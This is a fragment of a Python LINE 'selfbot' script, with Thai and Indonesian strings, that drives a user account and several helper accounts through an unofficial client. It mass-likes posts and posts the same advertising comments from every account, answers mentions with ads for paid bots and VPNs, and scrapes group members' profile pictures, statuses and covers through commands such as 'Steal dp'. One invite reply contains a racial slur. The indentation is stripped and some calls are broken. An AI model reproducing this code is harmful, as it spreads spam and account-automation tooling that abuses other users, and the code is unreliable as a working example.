'autoJoin':False,
'autoCancel':{"on":False,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"""
[ AOTO LIKE ]
[ SELF BOT ]
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999""",
"lang":"JP",
"comment":"Auto Like By ",
"welmsg":"welcome to group",
"commentOn":False,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999
▀██▀────██─██──██████
─██──██────██──██
─████──────██──██████
─██──██────██──██
▄██▄───██──██──██████
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999""",
"comment2":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999",
"comment3":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999.",
"comment4":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999.",
"commentOn":True,
"wc":False,
"likeOn":True,
"wc":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"Sambutan":False,
"tag":False,
"pesan":"☺อย่าแท้กบ่อยน่ะเดะจับเยสเรย☺",
"cNames":"",
"blacklist":{},
"group":False,
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def bot(op):
global LINETCRLogged
global ki
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "ub8e146e024acdc277a3ba6a7d7a30ca9":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
ki2.like(url[25:58], url[66:], likeType=1001)
ki3.like(url[25:58], url[66:], likeType=1001)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = cl.getContact(msg.from_)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cName = contact.displayName
msg.text1 = "@"+cName+" "
# balas = ["แท็คทำไมครับ(..)รึสนใจจะเอาเราไปใช้\nสนใจติดต่อได้ที่\nLine ID : Kmzaaa\nhttp://line.me/ti/p/eOuAF1hhYx\nటู้ສန้ণს☣နัဂສ૭ບĆĿŰß☣"]
balas = ["มีเชลบอทลบรัน พร้อมคิกเก้อ💟\nลบบินกลุ่ม ออโต้ไลค์ และอื่นๆอีกมากมาย\n🔒กันสมาชิกเปิดลิ้งห้อง\n🔒กันรัน\n🔒กันสมาชิกเชิญคนนอกเข้า\n🔒กันสมาชิกเปลี่ยนชื่อกลุ่ม\n🔒กันคนนอกเข้ามาลบคนในกลุ่ม\n👉และมีเชิพเวอร์vpn(เน็ต) มีทั้งรายเดือนและรายวัน👈\n👉สนใจติดต่อลิ้งด้านล่างเรยครับ👈\nโอนเข้าบัญชี💲เทานั้น\nสนใจ แอดมาคุยได้\nhttp://line.me/ti/p/~getk3333\nhttp://line.me/ti/p/~getk9999"]
ret_ = msg.text1 + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.sendImageWithURL(msg.to,image)
break
#if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['kickMention'] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Putra lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
#3 ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# summon(op.param1,[op.param2])
#3 mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "MEMBER JOIN TO GROUP"
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["group"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1, " ยินดีต้อนรับ. เข้ามาแล้วก็อย่าลืมลงแชร์กันน่ะครับ @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\nหรือสนใจลงบอทป้องกัน , บอทแท็ก ติดต่อได้ที่Line ID : Kmzaaa\nhttp://line.me/ti/p/eOuAF1hhYx")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if wait['group'] == True:
if op.param2 in bot1:
return
cl.sendText(op.param1,"good Bye @ " + cl.getContact(op.param2).displayName + "รีบไปไหนอ่ะ. ไม่เป็นไรไว้เจอกันใหม่น่ะจ๊ะ")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait['group'] == True:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "😊ยินดีต้อนรับ 😊 @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n😃เข้ามาแร้วอย่าดื้อน่ะหนู😄")
print "MEMBER HAS JOIN THE GROUP"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER JOIN GROUP
# if op.type == 17:
# if wait["group"] == True:
# if op.param2 in admin:
# return
# ginfo = cl.getGroup(op.param1)
# contact = cl.getContact(op.param2)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(op.param1,image)
# print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
# if op.type == 25:
# msg=op.message
# if "@"+cl.getProfile().displayName in msg.text:
# if wait["tag"] == True:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = (wait["pesan"])
# jawaban = (jawab)
# contact = cl.getContact(msg.from_)
# path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(msg.to, path)
# cl.sendText(msg.to,jawaban)
# print "ada orang tag"
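# contentType 13 is a shared contact card; the handlers below use the contact's mid to
# manage the comment blacklist (wblack/dblack), the kick blacklist (wblacklist/dblacklist),
# and to dump profile details when the "contact" flag in wait is switched on.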
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#--------------------------------------------------
# elif msg.text.lower() == 'help2':
# if wait["lang"] == "JP":
#				cl.sendText(msg.to,help2Message)
# else:
# cl.sendText(msg.to,help2Message)
#----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
elif "M @" in msg.text:
_name = msg.text.replace("M @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#----------------------------------------------------------
elif msg.text in ["group","รายชื่อ"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[★] %s\n" % (cl.getGroup(i).name +"→["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"▒▒▓█[List Group]█▓▒▒\n"+ h +"Total Group =" +"["+str(len(gid))+"]")
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
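# The commands below only push LINE contact cards for the self account and the assistant
# accounts (ki .. ki6); the mid variables (kimid, ki2mid, ...) are assumed to be filled in at login.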
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Mybot" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
# if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['detectMention'] == True:
# contact = kr.getContact(msg.from_)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cName = contact.displayName
# msg.text1 = "@"+cName+" "
# balas = ["💓อย่าแท้กสิเตง💓"]
# ret_ = msg.text1 + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# kr.sendText(msg.to,ret_)
# kr.sendImageWithURL(msg.to,image)
# break
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
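# Profile rename/bio commands. The length checks (20 characters for names, 500 for bios)
# appear to mirror LINE's profile limits, hence the guard before each updateProfile() call.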
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
				profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
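# "allin": temporarily disables the group's join-by-ticket lock, reissues a group ticket so
# each assistant bot can join by ticket, then re-enables the lock afterwards.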
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------------
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟เปิดอ่านคอนแทคสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"🌟ปิดอ่านคอนแทคสำเร็จ🌟")
elif msg.text.lower() == 'protect on':
if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ��")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิดสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค���ตเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"��ล็อคการเชิญกลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if msg.from_ in admin:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญสมาชิกเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait['detectMention'] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait['detectMention'] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["on"]:
wait['group'] = True
cl.sendText(msg.to,"เปิดต้อนรับแร้ว")
elif msg.text in ["off"]:
